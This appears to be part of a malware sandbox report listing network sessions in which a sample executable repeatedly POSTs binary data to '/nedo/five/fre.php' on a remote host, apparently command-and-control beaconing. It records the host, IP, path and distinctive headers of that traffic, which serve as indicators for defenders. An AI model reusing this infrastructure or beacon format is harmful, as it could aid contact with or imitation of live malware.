                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                30192.168.11.2049817192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData
                                Nov 22, 2021 15:29:35.268440008 CET354OUTPOST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:29:35.589385986 CET355INHTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:29:35 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                300192.168.11.2050087192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                301192.168.11.2050088192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                302192.168.11.2050089192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                303192.168.11.2050090192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                304192.168.11.2050091192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                305192.168.11.2050092192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                306192.168.11.2050093192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                307192.168.11.2050094192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                308192.168.11.2050095192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                309192.168.11.2050096192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                31192.168.11.2049818192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData
                                Nov 22, 2021 15:29:36.276251078 CET356OUTPOST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:29:36.588426113 CET356INHTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:29:36 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                310192.168.11.2050097192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                311192.168.11.2050098192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                312192.168.11.2050099192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                313192.168.11.2050100192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                314192.168.11.2050101192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                315192.168.11.2050102192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                316192.168.11.2050103192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                317192.168.11.2050104192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                318192.168.11.2050105192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                319192.168.11.2050106192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                32192.168.11.2049819192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData
                                Nov 22, 2021 15:29:37.248907089 CET357OUTPOST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:29:37.568229914 CET357INHTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:29:37 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                320192.168.11.2050107192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                321192.168.11.2050108192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                322192.168.11.2050109192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                323192.168.11.2050110192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                324192.168.11.2050111192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                325192.168.11.2050112192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                326192.168.11.2050113192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                327192.168.11.2050114192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                328192.168.11.2050115192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                329192.168.11.2050116192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                33192.168.11.2049820192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData
                                Nov 22, 2021 15:29:38.193336010 CET358OUTPOST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:29:38.507232904 CET359INHTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:29:38 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                330192.168.11.2050117192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                331192.168.11.2050118192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                332192.168.11.2050119192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                333192.168.11.2050120192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                334192.168.11.2050121192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                335192.168.11.2050122192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                336192.168.11.2050123192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                337192.168.11.2050124192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                338192.168.11.2050125192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                339192.168.11.2050126192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                34192.168.11.2049821192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData
                                Nov 22, 2021 15:29:39.121937990 CET359OUTPOST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:29:39.435009956 CET360INHTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:29:39 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                340192.168.11.2050127192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                341192.168.11.2050128192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                342192.168.11.2050129192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                343192.168.11.2050130192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                344192.168.11.2050131192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                345192.168.11.2050132192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                346192.168.11.2050133192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                347192.168.11.2050134192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                348192.168.11.2050135192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                349192.168.11.2050136192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                35192.168.11.2049822192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData
                                Nov 22, 2021 15:29:39.980678082 CET361OUTPOST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:29:40.286241055 CET361INHTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:29:40 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                350192.168.11.2050137192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                351192.168.11.2050138192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                352192.168.11.2050139192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                353192.168.11.2050140192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                354192.168.11.2050141192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                355192.168.11.2050142192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                356192.168.11.2050143192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                357192.168.11.2050144192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                358192.168.11.2050145192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                359192.168.11.2050146192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                36192.168.11.2049823192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData
                                Nov 22, 2021 15:29:40.829111099 CET362OUTPOST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:29:41.142105103 CET362INHTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:29:40 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                360192.168.11.2050147192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                361192.168.11.2050148192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                362192.168.11.2050149192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                363192.168.11.2050150192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                364192.168.11.2050151192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                365192.168.11.2050152192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                366192.168.11.2050153192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                367192.168.11.2050154192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                368192.168.11.2050155192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                369192.168.11.2050156192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                37192.168.11.2049824192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData
                                Nov 22, 2021 15:29:41.656853914 CET363OUTPOST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:29:41.951401949 CET364INHTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:29:41 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                370192.168.11.2050157192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                371192.168.11.2050158192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                372192.168.11.2050159192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                373192.168.11.2050160192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                374192.168.11.2050161192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                375192.168.11.2050162192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                376192.168.11.2050163192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                377192.168.11.2050164192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                378192.168.11.2050165192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                379192.168.11.2050166192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                38192.168.11.2049825192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData
                                Nov 22, 2021 15:29:42.447762012 CET364OUTPOST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:29:42.733766079 CET365INHTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:29:42 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                380192.168.11.2050167192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                381192.168.11.2050168192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                382192.168.11.2050169192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                383192.168.11.2050170192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                384192.168.11.2050171192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                385192.168.11.2050172192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                386192.168.11.2050173192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                387192.168.11.2050174192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                388192.168.11.2050175192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                389192.168.11.2050176192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                39192.168.11.2049826192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData
                                Nov 22, 2021 15:29:43.155024052 CET366OUTPOST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:29:43.443574905 CET366INHTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:29:43 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                390192.168.11.2050177192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                391192.168.11.2050178192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                392192.168.11.2050179192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                393192.168.11.2050180192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                394192.168.11.2050181192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                395192.168.11.2050182192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                396192.168.11.2050183192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                397192.168.11.2050184192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                398192.168.11.2050185192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                399192.168.11.2050186192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                4192.168.11.2049791192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData
                                Nov 22, 2021 15:29:09.708760977 CET320OUTPOST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:29:10.039190054 CET320INHTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:29:09 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                40192.168.11.2049827192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData
                                Nov 22, 2021 15:29:43.984467030 CET367OUTPOST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:29:44.292969942 CET367INHTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:29:44 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                400192.168.11.2050187192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                401192.168.11.2050188192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


